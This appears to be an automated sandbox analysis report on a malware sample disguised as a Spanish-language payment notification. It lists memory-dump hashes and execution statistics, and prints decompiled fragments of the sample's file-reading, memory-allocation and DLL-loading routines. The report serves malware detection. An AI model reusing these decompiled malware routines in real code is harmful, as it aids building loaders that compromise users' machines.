                                              Uniqueness Score: -1.00%

                                              Memory Dump Source
                                              • Source File: 00000000.00000002.314113102.00000000076A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 076A0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_76a0000_Notificaci#U00f3n de pago.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: f5205af11b44a67cab14e8ab2c32197bfb4d63a3070b882ba00e6cba7fabdf6a
                                              • Instruction ID: 773e311ca303f772bcf69d094aebfc73d1db92fe4e201876fab4edd48a4c0cf0
                                              • Opcode Fuzzy Hash: f5205af11b44a67cab14e8ab2c32197bfb4d63a3070b882ba00e6cba7fabdf6a
                                              • Instruction Fuzzy Hash: E8013178A05119CFE754EF64C8557AD77B2FB89304F0045E5990DA7348CA345E89CF50
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Memory Dump Source
                                              • Source File: 00000000.00000002.314113102.00000000076A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 076A0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_76a0000_Notificaci#U00f3n de pago.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: bc07ae89fbd02e25796da44a83fc6a341eb4094bf234fdc186e82527c6da6e2a
                                              • Instruction ID: e129305835fa540d6357782ae9a50cdc29e79564fba0bf1aede895953ed89e01
                                              • Opcode Fuzzy Hash: bc07ae89fbd02e25796da44a83fc6a341eb4094bf234fdc186e82527c6da6e2a
                                              • Instruction Fuzzy Hash: 34F0ED7880C209AFC705CFA0E801A98FF70AB11300F20819AEC4063342CB32A961CBA5
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Memory Dump Source
                                              • Source File: 00000000.00000002.314113102.00000000076A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 076A0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_76a0000_Notificaci#U00f3n de pago.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: c789785ba0e5e42edb49a2a246a56e5aa637a78a2d8d78bd3b64f3bd97498ecf
                                              • Instruction ID: 9f1bec77fabc88e345810d366e2fc03d6141d858bca3fd24cb1429d96b07dcc9
                                              • Opcode Fuzzy Hash: c789785ba0e5e42edb49a2a246a56e5aa637a78a2d8d78bd3b64f3bd97498ecf
                                              • Instruction Fuzzy Hash: 35F0A0B5C08395CBFF11DFA88C41B99BFA0AB16310F4481DEC8865B246E7708D81CF62
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Memory Dump Source
                                              • Source File: 00000000.00000002.314113102.00000000076A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 076A0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_76a0000_Notificaci#U00f3n de pago.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 16364800410e9e65a5f1fd89a32ae23a2e7659e459c04f168e956998b02511e6
                                              • Instruction ID: f83ec3062a4c94987ce8f7191624d5fceeabd9ed51e1ec07b65d1ff2eb981bd7
                                              • Opcode Fuzzy Hash: 16364800410e9e65a5f1fd89a32ae23a2e7659e459c04f168e956998b02511e6
                                              • Instruction Fuzzy Hash: BBE08C78918208EBCB04DFA4E841A9CFF75EB45300F20C2A9EC4423340CB32AE52DA95
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Memory Dump Source
                                              • Source File: 00000000.00000002.314113102.00000000076A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 076A0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_76a0000_Notificaci#U00f3n de pago.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: a9ccd54bcf12bd55ee2f08efa6ca2f45ae9aa4dc2aa2257e5f107d6025d6cabb
                                              • Instruction ID: d7919067339ff90f414a17149988b4a04b194c186837f8db0218d5739eca8771
                                              • Opcode Fuzzy Hash: a9ccd54bcf12bd55ee2f08efa6ca2f45ae9aa4dc2aa2257e5f107d6025d6cabb
                                              • Instruction Fuzzy Hash: 1ED012B541910CEBC711EFB4D51569E7FB9EB45205F0442A6AD0693110EF321E44DFA1
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Memory Dump Source
                                              • Source File: 00000000.00000002.314113102.00000000076A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 076A0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_76a0000_Notificaci#U00f3n de pago.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: f59746e9aec6b43543e20f16517c259585415897f34d340322e93b30a44a44ea
                                              • Instruction ID: 20f72b4804751a89e1a17a94865f0957d2e58b672c7d643cf896fb854984d0ac
                                              • Opcode Fuzzy Hash: f59746e9aec6b43543e20f16517c259585415897f34d340322e93b30a44a44ea
                                              • Instruction Fuzzy Hash: 49E04674A1811D8FEB14EF28C4607AD77B2FB89304F0041A88809A7388CB381E8ACF00
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Memory Dump Source
                                              • Source File: 00000000.00000002.314113102.00000000076A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 076A0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_76a0000_Notificaci#U00f3n de pago.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: e303159323018fa401243ced102fb245963ebd7e253fb2d7db67e93d4032f372
                                              • Instruction ID: 300cf5f9b5db9f4ad8c43db39ddf86195307f364d2308ae79756b75e4778924d
                                              • Opcode Fuzzy Hash: e303159323018fa401243ced102fb245963ebd7e253fb2d7db67e93d4032f372
                                              • Instruction Fuzzy Hash: 9BE001B8E14259DF8B00CFA5D98089CBBB0BF09340F24942AE802A7304E670AC028F00
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Memory Dump Source
                                              • Source File: 00000000.00000002.314113102.00000000076A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 076A0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_76a0000_Notificaci#U00f3n de pago.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 2beb574b11fb568ac17176699bb52ad4cdfb7d3bbc41ecc7418c0bc9f9884a31
                                              • Instruction ID: da1c10cdb814a8a61068c66b0c592690cb1e2224b142fb4749d2a12ab93f1342
                                              • Opcode Fuzzy Hash: 2beb574b11fb568ac17176699bb52ad4cdfb7d3bbc41ecc7418c0bc9f9884a31
                                              • Instruction Fuzzy Hash: 7DC0123402D2094BCA80FBB5EAA5456376BAA813087808C2095048E539DF70A6448A96
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Memory Dump Source
                                              • Source File: 00000000.00000002.314113102.00000000076A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 076A0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_76a0000_Notificaci#U00f3n de pago.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 2e5e0f654153c61d61426e2d30d86c303bf1355ddad46bded936ec9a8114083e
                                              • Instruction ID: 8f65d303aa9b1a83324e1e10f2d326d0645836d1259f322c812642fe03b80846
                                              • Opcode Fuzzy Hash: 2e5e0f654153c61d61426e2d30d86c303bf1355ddad46bded936ec9a8114083e
                                              • Instruction Fuzzy Hash: FBC08CF78A0040AFE302AE209C008466F56EB37204B02C8A29002CE0B2E939C4249B25
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Memory Dump Source
                                              • Source File: 00000000.00000002.314113102.00000000076A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 076A0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_76a0000_Notificaci#U00f3n de pago.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: c1c8ead85bcff0e75f214515c6c40201d3363de80a04c3f463e7df0c06d32de8
                                              • Instruction ID: 9f0441d24ac2ca17ac1d8c62d25b853d34ea23e52a65a6e3a79d3515f6bab7cd
                                              • Opcode Fuzzy Hash: c1c8ead85bcff0e75f214515c6c40201d3363de80a04c3f463e7df0c06d32de8
                                              • Instruction Fuzzy Hash: 99D0B1B8D2431DEB9B00DFA5D99889DBBB2BB4A341B10542AA80AAB350E7306D45CF10
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Memory Dump Source
                                              • Source File: 00000000.00000002.314113102.00000000076A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 076A0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_76a0000_Notificaci#U00f3n de pago.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: f6fa39e438241eb65d5c19587e727a3430ffa5d0820af7343df99dd7a92bfba6
                                              • Instruction ID: 11519933149e10041101248e62498eef665c0f541601a0d5698699ad240f748c
                                              • Opcode Fuzzy Hash: f6fa39e438241eb65d5c19587e727a3430ffa5d0820af7343df99dd7a92bfba6
                                              • Instruction Fuzzy Hash: E0D0B1B8D26219FFCB04CFA5EA9489DBBB1BB5A690B10646AF812A2300E63059018E10
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Memory Dump Source
                                              • Source File: 00000000.00000002.309829172.0000000002F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F10000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_2f10000_Notificaci#U00f3n de pago.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 9c9e26ff6831fc83d152d48e9f73c27590cab08f8d10d05a7efefdb38cc37984
                                              • Instruction ID: e80808b5a0752149063f4b9dc1838e29c3423bbe9c60cf9bf5e3ec4df4dea9ca
                                              • Opcode Fuzzy Hash: 9c9e26ff6831fc83d152d48e9f73c27590cab08f8d10d05a7efefdb38cc37984
                                              • Instruction Fuzzy Hash: 2312B4F14217468AD332CF65E99B28D3FE9B75532CF904208F2616EAD1DBB8114ACF94
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Memory Dump Source
                                              • Source File: 00000000.00000002.309829172.0000000002F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F10000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_2f10000_Notificaci#U00f3n de pago.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: ae43929a1ec5d080e3066ba0cc0fa944b55a7f390e613504a3e1934d6525fc53
                                              • Instruction ID: 4e7e6e7e551c4cab11947749896231a9111a6d08ec1e18fe77b195638e77ebb8
                                              • Opcode Fuzzy Hash: ae43929a1ec5d080e3066ba0cc0fa944b55a7f390e613504a3e1934d6525fc53
                                              • Instruction Fuzzy Hash: 12A18C32E002198FCF15DFA5C8849DEBBF2FF85340B55816AEA05AB260EB71E905CF40
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Memory Dump Source
                                              • Source File: 00000000.00000002.309829172.0000000002F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F10000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_2f10000_Notificaci#U00f3n de pago.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: e27573148bb2e3cbcf065375d174f1c262917c33ab890f8691019b77a0bdd192
                                              • Instruction ID: 7a329e83c8f1ca29cea976fdab8b678a2514cceccfc5db15a45b59f86b0b4ee2
                                              • Opcode Fuzzy Hash: e27573148bb2e3cbcf065375d174f1c262917c33ab890f8691019b77a0bdd192
                                              • Instruction Fuzzy Hash: CCC105B18217468AD721DF65E98B18D3FE9BB9532CF504208F2616F6D0DBB8508ACF94
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Execution Graph

                                              Execution Coverage:7.9%
                                              Dynamic/Decrypted Code Coverage:0%
                                              Signature Coverage:3.4%
                                              Total number of Nodes:725
                                              Total number of Limit Nodes:81

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 11 41a362-41a36e 12 41a370-41a3b9 call 41af60 11->12 13 41a35a-41a361 NtCreateFile 11->13
                                              APIs
                                              • NtCreateFile.NTDLL(00000060,00409103,?,004157F7,00409103,FFFFFFFF,?,?,FFFFFFFF,00409103,004157F7,?,00409103,00000060,00000000,00000000), ref: 0041A35D
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000008.00000002.383069133.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_400000_Notificaci#U00f3n de pago.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: CreateFile
                                              • String ID: ZUA
                                              • API String ID: 823142352-1484630627
                                              • Opcode ID: 99c5665e71d1234d2cc15bda216b12b88b123dbe340bd1619cf7bf1464753c65
                                              • Instruction ID: 9b940941bda36b1b76fb894d53a4e24529201725bc6a06f281a9c9a88be20db2
                                              • Opcode Fuzzy Hash: 99c5665e71d1234d2cc15bda216b12b88b123dbe340bd1619cf7bf1464753c65
                                              • Instruction Fuzzy Hash: C0016DB22002086FCB04DF98DC85DEB77ADEF8C714F158219BA0D93200D634E8118BA5
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 17 41a3ba-41a3bc 18 41a428-41a439 17->18 19 41a3be-41a3d6 17->19 20 41a3dc-41a409 NtReadFile 19->20 21 41a3d7 call 41af60 19->21 21->20
                                              C-Code - Quality: 16%
                                              			E0041A3BA(void* __eflags, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, intOrPtr _a32, intOrPtr _a36, char _a40) {
                                              				void* _t23;
                                              				intOrPtr* _t33;
                                              				intOrPtr* _t35;
                                              				signed int _t37;
                                              				signed int _t39;
                                              
                                              				if(__eflags > 0) {
                                              					 *0x0000007E =  *((intOrPtr*)(0x7e)) + 0x7e;
                                              					__eflags =  *((intOrPtr*)(0x7e));
                                              					return  *((intOrPtr*)( *_t33))(_a12);
                                              				} else {
                                              					_t39 = _t37 << 0x55;
                                              					_t18 = _a4;
                                              					_t35 = _a4 + 0xc64;
                                              					E0041AF60( *((intOrPtr*)(_t18 + 0x14)), _t18, _t35,  *((intOrPtr*)(_t18 + 0x14)), 0, 0x2a);
                                              					_t4 =  &_a40; // 0x415671
                                              					_t23 =  *((intOrPtr*)( *_t35))(_a8, _a12, _a16, _a20, _a24, _a28, _a32, _a36,  *_t4, _t33, _t39); // executed
                                              					return _t23;
                                              				}
                                              			}








                                              0x0041a409

                                              APIs
                                              • NtReadFile.NTDLL(004159B2,5DA515B3,FFFFFFFF,?,?,?,004159B2,?,qVA,FFFFFFFF,5DA515B3,004159B2,?,00000000), ref: 0041A405
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000008.00000002.383069133.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_400000_Notificaci#U00f3n de pago.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: FileRead
                                              • String ID: qVA
                                              • API String ID: 2738559852-1195921569
                                              • Opcode ID: 64a8b81d1b146c885d7a465a2046b3f6c53bba05c3fad44dcf3484e1cd6163dd
                                              • Instruction ID: 7d3968b4006926e1df38483a2bbdba915b3b308a85bed2e611cd9c91fb890cc3
                                              • Opcode Fuzzy Hash: 64a8b81d1b146c885d7a465a2046b3f6c53bba05c3fad44dcf3484e1cd6163dd
                                              • Instruction Fuzzy Hash: 970128B6200208AFDB14DF98DC81DDB77A9EF8C754F158249FE1C97241D630E911CBA1
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 23 41a3c0-41a409 call 41af60 NtReadFile
                                              C-Code - Quality: 37%
                                              			E0041A3C0(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, intOrPtr _a32, intOrPtr _a36, char _a40) {
                                              				void* _t18;
                                              				intOrPtr* _t27;
                                              
                                              				_t13 = _a4;
                                              				_t27 = _a4 + 0xc64;
                                              				E0041AF60( *((intOrPtr*)(_t13 + 0x14)), _t13, _t27,  *((intOrPtr*)(_t13 + 0x14)), 0, 0x2a);
                                              				_t4 =  &_a40; // 0x415671
                                              				_t18 =  *((intOrPtr*)( *_t27))(_a8, _a12, _a16, _a20, _a24, _a28, _a32, _a36,  *_t4); // executed
                                              				return _t18;
                                              			}






                                              APIs
                                              • NtReadFile.NTDLL(004159B2,5DA515B3,FFFFFFFF,?,?,?,004159B2,?,qVA,FFFFFFFF,5DA515B3,004159B2,?,00000000), ref: 0041A405
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000008.00000002.383069133.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_400000_Notificaci#U00f3n de pago.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: FileRead
                                              • String ID: qVA
                                              • API String ID: 2738559852-1195921569
                                              • Opcode ID: b510bff5fdfeed8eb0fffb7cee2b24ec4e8af31a288f6594e015d3a0b80bf648
                                              • Instruction ID: 73ffa567400af51592167d85ddd4e2221f8c27920a6f65a97cb7e9eff46762f8
                                              • Opcode Fuzzy Hash: b510bff5fdfeed8eb0fffb7cee2b24ec4e8af31a288f6594e015d3a0b80bf648
                                              • Instruction Fuzzy Hash: 99F0B7B2200208AFCB14DF99DC85EEB77ADEF8C754F158249BE0D97241D630E811CBA5
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 270 40a130-40a14c 271 40a154-40a159 270->271 272 40a14f call 41cdb0 270->272 273 40a15b-40a15e 271->273 274 40a15f-40a16d call 41d1d0 271->274 272->271 277 40a17d-40a18e call 41b500 274->277 278 40a16f-40a17a call 41d450 274->278 283 40a190-40a1a4 LdrLoadDll 277->283 284 40a1a7-40a1aa 277->284 278->277 283->284
                                              C-Code - Quality: 100%
                                              			E0040A130(void* __eflags, void* _a4, intOrPtr _a8) {
                                              				char* _v8;
                                              				struct _EXCEPTION_RECORD _v12;
                                              				struct _OBJDIR_INFORMATION _v16;
                                              				char _v536;
                                              				void* _t15;
                                              				struct _OBJDIR_INFORMATION _t17;
                                              				struct _OBJDIR_INFORMATION _t18;
                                              				void* _t30;
                                              				void* _t31;
                                              				void* _t32;
                                              
                                              				_v8 =  &_v536;
                                              				_t15 = E0041CDB0( &_v12, 0x104, _a8);
                                              				_t31 = _t30 + 0xc;
                                              				if(_t15 != 0) {
                                              					_t17 = E0041D1D0(__eflags, _v8);
                                              					_t32 = _t31 + 4;
                                              					__eflags = _t17;
                                              					if(_t17 != 0) {
                                              						E0041D450( &_v12, 0);
                                              						_t32 = _t32 + 8;
                                              					}
                                              					_t18 = E0041B500(_v8);
                                              					_v16 = _t18;
                                              					__eflags = _t18;
                                              					if(_t18 == 0) {
                                              						LdrLoadDll(0, 0,  &_v12,  &_v16); // executed
                                              						return _v16;
                                              					}
                                              					return _t18;
                                              				} else {
                                              					return _t15;
                                              				}
                                              			}














                                              APIs
                                              • LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 0040A1A2
                                              Memory Dump Source
                                              • Source File: 00000008.00000002.383069133.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_400000_Notificaci#U00f3n de pago.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: Load
                                              • String ID:
                                              • API String ID: 2234796835-0
                                              • Opcode ID: 14d9637ae75740dab2169e9387d270c154b89039a09ccd4394a8d994bcbcbc66
                                              • Instruction ID: 362e94697f91f25e03f34ab22cb5edf479b96fa73b6a4b5d0a09f6ce58eb7145
                                              • Opcode Fuzzy Hash: 14d9637ae75740dab2169e9387d270c154b89039a09ccd4394a8d994bcbcbc66
                                              • Instruction Fuzzy Hash: 8D0112B5D4020DB7DB10DBA5DC42FDEB7789B54308F0041A6A908A7281F675EB54CB95
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 285 41a30a-41a30e 286 41a310-41a335 call 41af60 285->286 287 41a338-41a361 NtCreateFile 285->287 286->287
                                              APIs
                                              • NtCreateFile.NTDLL(00000060,00409103,?,004157F7,00409103,FFFFFFFF,?,?,FFFFFFFF,00409103,004157F7,?,00409103,00000060,00000000,00000000), ref: 0041A35D
                                              Memory Dump Source
                                              • Source File: 00000008.00000002.383069133.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_400000_Notificaci#U00f3n de pago.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: CreateFile
                                              • String ID:
                                              • API String ID: 823142352-0
                                              • Opcode ID: 84bb8f054b78d2a098247181830a90009f605a74ffb9fbb1720c37eface5a20c
                                              • Instruction ID: 5595e84fc399c294db30b01f44f65e681a7b3b29501624dbdc8fca7861f983bd
                                              • Opcode Fuzzy Hash: 84bb8f054b78d2a098247181830a90009f605a74ffb9fbb1720c37eface5a20c
                                              • Instruction Fuzzy Hash: 1F01AFB6215208ABCB18DF89DC85EEB77ADAF8C754F118258BA0997241D630E8518BA4
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 290 41a310-41a361 call 41af60 NtCreateFile
                                              APIs
                                              • NtCreateFile.NTDLL(00000060,00409103,?,004157F7,00409103,FFFFFFFF,?,?,FFFFFFFF,00409103,004157F7,?,00409103,00000060,00000000,00000000), ref: 0041A35D
                                              Memory Dump Source
                                              • Source File: 00000008.00000002.383069133.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_400000_Notificaci#U00f3n de pago.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: CreateFile
                                              • String ID:
                                              • API String ID: 823142352-0
                                              • Opcode ID: ede47e358c6f592494742841678bda465d8b9d6efb767baf41057bbc73943ae4
                                              • Instruction ID: 22a17d5a8ca0ee81e299f457139f331d0ae15f1ba5b0ed3d189dcc3aa1234c62
                                              • Opcode Fuzzy Hash: ede47e358c6f592494742841678bda465d8b9d6efb767baf41057bbc73943ae4
                                              • Instruction Fuzzy Hash: 9CF06DB6215208AFCB48DF89DC85EEB77ADAF8C754F158248BA0D97241D630F8518BA4
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 294 41a4f0-41a506 295 41a50c-41a52d NtAllocateVirtualMemory 294->295 296 41a507 call 41af60 294->296 296->295
                                              C-Code - Quality: 35%
                                              			E0041A4F0(void* __ebx, signed int __ecx, signed int* __edx, intOrPtr _a4, void* _a8, PVOID* _a12, long _a16, long* _a20, long _a24, long _a28) {
                                              				void* _v3;
                                              				intOrPtr _t13;
                                              				long _t18;
                                              				void* _t27;
                                              
                                              				_t13 = _a4;
                                              				 *(__ebx + 0x6a561448) =  *(__ebx + 0x6a561448) | __ecx;
                                              				 *__edx =  *__edx ^ __ecx;
                                              				_push(__ecx);
                                              				_t4 = _t13 + 0xc7c; // 0x3c7c
                                              				_t27 = _t4;
                                              				 *((intOrPtr*)(_t27 + 0x50)) =  *((intOrPtr*)(_t27 + 0x50)) + __edx;
                                              				E0041AF60(__ecx);
                                              				_t18 = NtAllocateVirtualMemory(_a8, _a12, _a16, _a20, _a24, _a28); // executed
                                              				return _t18;
                                              			}








                                              APIs
                                              • NtAllocateVirtualMemory.NTDLL(?,00000000,?,0041B19D,?,0041B19D,?,00000000,?,00003000,00000040,00409103,00000000), ref: 0041A529
                                              Memory Dump Source
                                              • Source File: 00000008.00000002.383069133.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_400000_Notificaci#U00f3n de pago.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: AllocateMemoryVirtual
                                              • String ID:
                                              • API String ID: 2167126740-0
                                              • Opcode ID: 3937d7bcd71450592b7c43b4c62eb3862b139fe450dcdc5e45fc7760e87cf521
                                              • Instruction ID: 0f6e90ac6ad316f0230f9505ffb1913ba8f116b783957ff2d7da3ee6bc7086c1
                                              • Opcode Fuzzy Hash: 3937d7bcd71450592b7c43b4c62eb3862b139fe450dcdc5e45fc7760e87cf521
                                              • Instruction Fuzzy Hash: 53F0F2B2210208ABDB14DF89DC81EAB77ADAF8C654F118109BA0897241C630E8118BA4
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              C-Code - Quality: 36%
                                              			E0041A4F4(void* __eax, void* __ebx, signed int __ecx, signed int* __edx) {
                                              				long _t17;
                                              				void* _t26;
                                              				void* _t28;
                                              				void* _t29;
                                              
                                              				_t12 = __eax;
                                              				_t29 = _t28 + 1;
                                              				 *(__ebx + 0x6a561448) =  *(__ebx + 0x6a561448) | __ecx;
                                              				 *__edx =  *__edx ^ __ecx;
                                              				_push(__ecx);
                                              				_t3 = _t12 + 0xc7c; // 0x3c7c
                                              				_t26 = _t3;
                                              				 *((intOrPtr*)(_t26 + 0x50)) =  *((intOrPtr*)(_t26 + 0x50)) + __edx;
                                              				E0041AF60(__ecx);
                                              				_t17 = NtAllocateVirtualMemory( *(_t29 + 0xc),  *(_t29 + 0x10),  *(_t29 + 0x14),  *(_t29 + 0x18),  *(_t29 + 0x1c),  *(_t29 + 0x20)); // executed
                                              				return _t17;
                                              			}








                                              APIs
                                              • NtAllocateVirtualMemory.NTDLL(?,00000000,?,0041B19D,?,0041B19D,?,00000000,?,00003000,00000040,00409103,00000000), ref: 0041A529
                                              Memory Dump Source
                                              • Source File: 00000008.00000002.383069133.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_400000_Notificaci#U00f3n de pago.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: AllocateMemoryVirtual
                                              • String ID:
                                              • API String ID: 2167126740-0
                                              • Opcode ID: b4f81707f2b7de57fd2dc404247adcc091755934319da5c644022f49bca311f3
                                              • Instruction ID: 74dfac1be48816c7645cb56de637f97fbd8be5d423e69ae81fbce4f2905d1d4d
                                              • Opcode Fuzzy Hash: b4f81707f2b7de57fd2dc404247adcc091755934319da5c644022f49bca311f3
                                              • Instruction Fuzzy Hash: 0EE06DB11001496BCB04DF98DC84CE777A8EF8C214B15864DFD5C97202C230E861CBB1
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              C-Code - Quality: 31%
                                              			E0041A4EA(void* __eax, void* __ebx, signed int __ecx, signed int* __edx, intOrPtr _a8, void* _a12, PVOID* _a16, long _a20, long* _a24, long _a28, long _a32) {
                                              				void* _v3;
                                              				long _t19;
                                              				signed int* _t24;
                                              				void* _t28;
                                              
                                              				_t24 = __edx;
                                              				_t21 = __ecx;
                                              				_t14 = __eax + 0x99;
                                              				_pop(_t30);
                                              				if(__eax + 0x99 == 0) {
                                              					_t14 = _a8;
                                              					 *(__ebx + 0x6a561448) =  *(__ebx + 0x6a561448) | __ecx;
                                              					 *__edx =  *__edx ^ __ecx;
                                              					_push(__ecx);
                                              					_t4 = _t14 + 0xc7c; // 0x3c7c
                                              					_t28 = _t4;
                                              				}
                                              				 *((intOrPtr*)(_t28 + 0x50)) =  *((intOrPtr*)(_t28 + 0x50)) + _t24;
                                              				E0041AF60(_t21);
                                              				_t19 = NtAllocateVirtualMemory(_a12, _a16, _a20, _a24, _a28, _a32); // executed
                                              				return _t19;
                                              			}








                                              APIs
                                              • NtAllocateVirtualMemory.NTDLL(?,00000000,?,0041B19D,?,0041B19D,?,00000000,?,00003000,00000040,00409103,00000000), ref: 0041A529
                                              Memory Dump Source
                                              • Source File: 00000008.00000002.383069133.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_400000_Notificaci#U00f3n de pago.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: AllocateMemoryVirtual
                                              • String ID:
                                              • API String ID: 2167126740-0
                                              • Opcode ID: 365bb38cbcf2ef7c2306ef7175cae84be15631ef515134ec9cd32fd0cae4c696
                                              • Instruction ID: 397b95ae5166c2976ce42ef46706b741dec79d1a0ba1e7c6281f34adc7ebd0c7
                                              • Opcode Fuzzy Hash: 365bb38cbcf2ef7c2306ef7175cae84be15631ef515134ec9cd32fd0cae4c696
